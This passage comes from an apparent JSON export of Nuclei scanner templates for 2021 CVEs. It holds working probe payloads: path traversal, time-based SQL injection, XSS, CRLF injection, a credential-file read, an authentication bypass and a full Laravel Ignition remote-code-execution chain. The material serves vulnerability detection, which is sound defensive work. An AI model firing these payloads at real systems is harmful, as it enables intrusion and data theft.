https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-30497\n cwe-id: CWE-22\n epss-score: 0.95284\n epss-percentile: 0.99297\n cpe: cpe:2.3:a:ivanti:avalanche:6.3.2:*:*:*:*:windows:*:*\n metadata:\n max-request: 1\n vendor: ivanti\n product: avalanche\n framework: windows\n 
tags: cve2021,cve,avalanche,traversal,lfi,ivanti,windows\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"for 16-bit app support\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203161ea5c26c4c512386e2efe937f9ae5b4d1450eee8b0a2d7c58cc7e6cb181c4022012d878b741870619e46248e6c0979e2defbed91775c861658417c3125cbdbb99:922c64590222798bb761d5b6d8e72950", "hash": "de5a37b637297b59f0f6b8456daf4e0f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308347" }, "name": "CVE-2021-3110.yaml", "content": "id: CVE-2021-3110\n\ninfo:\n name: PrestaShop 1.7.7.0 - SQL Injection\n author: Jaimin Gondaliya\n severity: critical\n description: |\n PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. 
An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of PrestaShop.\n reference:\n - https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e\n - https://www.exploit-db.com/exploits/49410\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3110\n - https://medium.com/%40gondaliyajaimin797/cve-2021-3110-75a24943ca5e\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-3110\n cwe-id: CWE-89\n epss-score: 0.83896\n epss-percentile: 0.98387\n cpe: cpe:2.3:a:prestashop:prestashop:1.7.7.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: prestashop\n product: prestashop\n tags: cve,cve2021,sqli,prestshop,edb,prestashop\n\nhttp:\n - raw:\n - |\n @timeout: 20s\n GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"application/json\")'\n - 'contains(body, \"average_grade\")'\n condition: and\n# digest: 4a0a0047304502200c34a850d39fbeeddbc540d1d52ba9d67b8a5204578f8e85b7f4eb94e0afb1830221009b0894c1fc99cb6734f92c3f89d62c547c7a350f7e0f4c6b5edacd23e5a8ae19:922c64590222798bb761d5b6d8e72950", "hash": "414f9ba5725fa694d1185e41528eae90", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308348" }, "name": "CVE-2021-31195.yaml", "content": "id: CVE-2021-31195\n\ninfo:\n name: Microsoft Exchange Server - Cross-Site 
Scripting\n author: infosecsanyam\n severity: medium\n description: Microsoft Exchange Server Outlook Web Access (OWA) is vulnerable to a reflected cross-site scripting vulnerability in the refurl parameter of /owa/auth/frowny.aspx; this is the reflected XSS used in the ProxyOracle attack chain described in the linked Orange Tsai post.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking, data theft, or other malicious activities.\n remediation: |\n Apply the latest security updates provided by Microsoft to mitigate this vulnerability.\n reference:\n - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31195\n - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31195\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-31195\n cwe-id: CWE-79\n epss-score: 0.92095\n epss-percentile: 0.98883\n cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: microsoft\n product: exchange_server\n shodan-query: http.title:\"Outlook\"\n tags: cve2021,cve,microsoft,exchange,owa,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\\&refurl=}}};alert(document.domain)//'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'alert(document.domain)//&et=ServerError'\n - 'mail/bootr.ashx'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 500\n# digest: 4a0a00473045022100add3f33b9d2e9d57977208908f642566e5d796379120daba28b5ee7685d38b7702204fc9e494046fce48f88b428f7fc426ddca6906f03364c55c0ca03adc357c0660:922c64590222798bb761d5b6d8e72950", "hash": "7f7306221bf70381a892c43f481573bf", "level": 4, 
"time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308349" }, "name": "CVE-2021-31249.yaml", "content": "id: CVE-2021-31249\n\ninfo:\n name: CHIYU TCP/IP Converter - Carriage Return Line Feed Injection\n author: geeknik\n severity: medium\n description: CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Note that the probe request also carries apply parameters (type=dev_name_apply, B_mac_apply=APPLY and TF_ip*/TF_port values), so it may change device settings if the device processes them; treat it as potentially intrusive.\n impact: |\n An unauthenticated attacker can inject CRLF sequences through the redirect= parameter and thereby control HTTP response headers (the probe terminates the Location header early), which per the description can be used to obtain sensitive information, modify data, or trigger unauthorized administrative operations on the device. The CVSS vector scores limited confidentiality and integrity impact (C:L/I:L/A:N); code execution is not implied.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the vulnerability.\n reference:\n - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249\n - https://www.chiyu-tech.com/msg/message-Firmware-update-87.html\n - https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31249\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-31249\n cwe-id: CWE-74\n epss-score: 0.00331\n epss-percentile: 0.68046\n cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: chiyu-tech\n product: bf-430_firmware\n tags: cve2021,cve,chiyu,crlf,iot,chiyu-tech\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"Location: setting.htm\"\n - \"\"\n condition: and\n\n - type: status\n status:\n - 302\n# digest: 
490a004630440220674f7b047dd79b81313c55158e47346df097fea462963ac3b7377e07ea1cae0a0220112a8e30ce253bd1cf3c6c6e4a8f7292c224ce07fdc61717b244fa2799ec5da3:922c64590222798bb761d5b6d8e72950", "hash": "64d95b2585cebf1e657d8b1e7bc97985", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30834a" }, "name": "CVE-2021-31250.yaml", "content": "id: CVE-2021-31250\n\ninfo:\n name: CHIYU TCP/IP Converter - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To mitigate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being rendered in web pages.\n reference:\n - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250\n - https://www.chiyu-tech.com/msg/message-Firmware-update-87.htm\n - https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31250\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-31250\n cwe-id: CWE-79\n epss-score: 0.97079\n epss-percentile: 0.99728\n cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: chiyu-tech\n product: bf-430_firmware\n tags: cve2021,cve,chiyu,xss,iot,intrusive,chiyu-tech\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY\"\n\n headers:\n Authorization: Basic OmFkbWlu\n host-redirects: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - text/html\n\n - type: word\n part: body\n words:\n - '\">'\n# digest: 490a00463044022079123fdae879b637f0e9fb80ff3f14cd52ea536bb21973d4e6c42e424732e1a60220569e530531fa3d07ffc1a9a0b5e334557b3ef103999048a2f5b1dd3ff6d64376:922c64590222798bb761d5b6d8e72950", "hash": "6d8b13b049d27107b77dfed030a3e0f6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30834b" }, "name": "CVE-2021-3129.yaml", "content": "id: CVE-2021-3129\n\ninfo:\n name: Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution\n author: z3bd,pdteam\n severity: critical\n description: Laravel version 8.4.2 and before with Ignition before 2.5.2 allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). 
This is exploitable on sites using debug mode with Laravel before 8.4.2. Note that this template's requests rewrite storage/logs/laravel.log through php://filter write chains, so running it modifies the target's log file.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, potentially allowing an attacker to take control of the affected system.\n remediation: |\n Upgrade the facade/ignition package to 2.5.2 or later (the description lists Ignition before 2.5.2 as affected; see the linked ignition pull request) and upgrade Laravel to version 8.4.3 or higher. As a compensating control, never run production sites in debug mode, since the issue is only exploitable when debug mode is enabled.\n reference:\n - https://www.ambionics.io/blog/laravel-debug-rce\n - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3129\n - https://github.com/facade/ignition/pull/334\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-3129\n epss-score: 0.97468\n epss-percentile: 0.99958\n cpe: cpe:2.3:a:facade:ignition:*:*:*:*:*:laravel:*:*\n metadata:\n max-request: 6\n vendor: facade\n product: ignition\n framework: laravel\n tags: cve2021,cve,laravel,rce,vulhub,kev,facade\n\nhttp:\n - raw:\n - |\n POST /_ignition/execute-solution HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json\n Content-Type: application/json\n\n {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n - |\n POST /_ignition/execute-solution HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json\n Content-Type: application/json\n\n {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n - |\n POST /_ignition/execute-solution HTTP/1.1\n Host: {{Hostname}}\n 
Accept: application/json\n Content-Type: application/json\n\n {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"AA\"}}\n - |\n POST /_ignition/execute-solution HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json\n Content-Type: application/json\n\n {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=7
7=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\"}}\n - |\n POST /_ignition/execute-solution HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json\n Content-Type: application/json\n\n {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n - |\n POST /_ignition/execute-solution HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json\n Content-Type: application/json\n\n {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"phar://../storage/logs/laravel.log/test.txt\"}}\n\n 
matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"uid=\"\n - \"gid=\"\n - \"groups=\"\n - \"Illuminate\"\n condition: and\n\n - type: status\n status:\n - 500\n\n extractors:\n - type: regex\n regex:\n - \"(u|g)id=.*\"\n# digest: 490a0046304402205d2d40971acbffaccca7916ae65339dd25b3b3176b5f0da6e1e552afae33f0f6022009d0e75478ce655b009e77c18c2b19b3dec3fb49e155e93b7f5bafb2f58c2f4c:922c64590222798bb761d5b6d8e72950", "hash": "b52bc0ce89310a4fb9d0d913b28b1fc8", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30834c" }, "name": "CVE-2021-31537.yaml", "content": "id: CVE-2021-31537\n\ninfo:\n name: SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: SIS Informatik REWE GO SP17 before 7.7 contains a cross-site scripting vulnerability via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being displayed on web pages.\n reference:\n - https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/\n - http://seclists.org/fulldisclosure/2021/May/20\n - https://sisinformatik.com/rewe-go/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31537\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-31537\n cwe-id: CWE-79\n epss-score: 0.00355\n epss-percentile: 0.71454\n cpe: cpe:2.3:a:sisinformatik:sis-rewe_go:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: 
sisinformatik\n product: sis-rewe_go\n tags: cve2021,cve,xss,seclists,intrusive,sisinformatik\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \n - SIS-REWE\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n# digest: 490a0046304402204da43b60754d42852c0d693d43abcf91056309cafe0f417a0617d01a0f0ae6e502205bcbba054b716ae69bf7c9187fa6ff4c3ab2fb69bfe3a240d82721db8221ff5a:922c64590222798bb761d5b6d8e72950", "hash": "1f8d3793f860003504040207f4cc4f9b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30834d" }, "name": "CVE-2021-31581.yaml", "content": "id: CVE-2021-31581\n\ninfo:\n name: Akkadian Provisioning Manager - Information Disclosure\n author: geeknik\n severity: medium\n description: Akkadian Provisioning Manager is susceptible to information disclosure. The restricted shell provided can be escaped by abusing the Edit MySQL Configuration command. 
This command launches a standard VI editor interface which can then be escaped. Note that this template does not exercise the local shell escape; it checks whether the database configuration file /pme/database/pme/phinx.yml (with host:, name: and pass: entries, i.e. database credentials) is served unauthenticated over HTTP, which is the web-reachable symptom it can detect.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as user credentials or system configuration details.\n remediation: This issue was resolved in Akkadian OVA appliance version 3.0 and later, Akkadian Provisioning Manager 5.0.2 and later, and Akkadian Appliance Manager 3.3.0.314-4a349e0 and later.\n reference:\n - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/\n - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31581\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 4.4\n cve-id: CVE-2021-31581\n cwe-id: CWE-312,CWE-269\n epss-score: 0.00285\n epss-percentile: 0.65373\n cpe: cpe:2.3:a:akkadianlabs:ova_appliance:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: akkadianlabs\n product: ova_appliance\n tags: cve,cve2021,akkadian,mariadb,disclosure,akkadianlabs\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pme/database/pme/phinx.yml\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"host:\"\n - \"name:\"\n - \"pass:\"\n condition: and\n\n - type: word\n negative: true\n words:\n - \"html>\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c618c0c706f90ae263dca7f791eea7727f5208a02ff97a620dcdd3f48789bb41022100ae5d555a29e8c87d665ceaff0e8dae13667c2586e6402cb9b17e8e458f7dc467:922c64590222798bb761d5b6d8e72950", "hash": "9ebdae3a0f0bc82286a3ab5721b58762", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30834e" }, "name": "CVE-2021-31589.yaml", "content": "id: CVE-2021-31589\n\ninfo:\n name: BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting\n author: Ahmed Abou-Ela\n severity: medium\n description: BeyondTrust Secure Remote Access Base through 6.0.1 contains a cross-site scripting 
vulnerability which allows remote attackers to inject arbitrary web script or HTML.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement.\n remediation: |\n Upgrade to a patched version of BeyondTrust Secure Remote Access Base (6.0.2 or higher) that addresses the XSS vulnerability.\n reference:\n - https://packetstormsecurity.com/files/165408\n - https://cxsecurity.com/issue/WLB-2022010013\n - https://beyondtrustcorp.service-now.com/csm?sys_kb_id=922d0ab31bc1b490e73854ae034bcb7b&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=64fc14ffdb8f70d422725385ca9619cb\n - https://www.beyondtrust.com/docs/release-notes/index.htm\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31589\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-31589\n cwe-id: CWE-79\n epss-score: 0.00286\n epss-percentile: 0.65537\n cpe: cpe:2.3:o:beyondtrust:appliance_base_software:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: beyondtrust\n product: appliance_base_software\n shodan-query: 'set-cookie: nsbase_session'\n google-query: '\"BeyondTrust\" \"Redistribution Prohibited\"'\n tags: cve,cve2021,xss,packetstorm,beyondtrust,bomgar\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'bomgar'\n case-insensitive: true\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022068d41164ba855a2600f7fcfeb4d98a1ede131baf6cf5bae9be7f37e595bfe786022023c4b711bf8091b7d6c996aa06fc134a97a34eefab9dfeae693d6ac7e3061bd1:922c64590222798bb761d5b6d8e72950", "hash": "856aa1d7c80ef855ec4e9f67c3a3bd38", "level": 4, "time": "2024-05-17 
23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30834f" }, "name": "CVE-2021-31602.yaml", "content": "id: CVE-2021-31602\n\ninfo:\n name: Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass\n author: pussycat0x\n severity: high\n description: Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x are vulnerable to authentication bypass. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the server.\n remediation: |\n Apply the latest security patches or updates provided by Hitachi Vantara to fix the authentication bypass vulnerability.\n reference:\n - https://seclists.org/fulldisclosure/2021/Nov/13\n - https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software\n - https://hawsec.com/publications/pentaho/HVPENT210401-Pentaho-BA-Security-Assessment-Report-v1_1.pdf\n - https://www.hitachi.com/hirt/security/index.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31602\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-31602\n cwe-id: CWE-287\n epss-score: 0.36115\n epss-percentile: 0.97042\n cpe: cpe:2.3:a:hitachi:vantara_pentaho:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: hitachi\n product: vantara_pentaho\n shodan-query: Pentaho\n tags: cve2021,cve,spring,seclists,pentaho,auth-bypass,hitachi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js\"\n - 
\"{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'Anonymous'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b35315666af836eb0d1c0cb629dcaa9244de7f8bef62b0d942503cd51f77f79a02203a67df731f946a044f7dd7a2137b3fbcc76a48fd94edd78b8ef4ed6f2300d002:922c64590222798bb761d5b6d8e72950", "hash": "95bb560161575b8e6d0299666182ebe5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308350" }, "name": "CVE-2021-31682.yaml", "content": "id: CVE-2021-31682\n\ninfo:\n name: WebCTRL OEM <= 6.5 - Cross-Site Scripting\n author: gy741,dhiyaneshDk\n severity: medium\n description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of WebCTRL OEM that addresses the XSS vulnerability (CVE-2021-31682).\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31682\n - https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS\n - https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/\n - http://packetstormsecurity.com/files/164707/WebCTRL-OEM-6.5-Cross-Site-Scripting.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-31682\n cwe-id: CWE-79\n epss-score: 0.01492\n epss-percentile: 0.86569\n cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: automatedlogic\n product: webctrl\n shodan-query: 
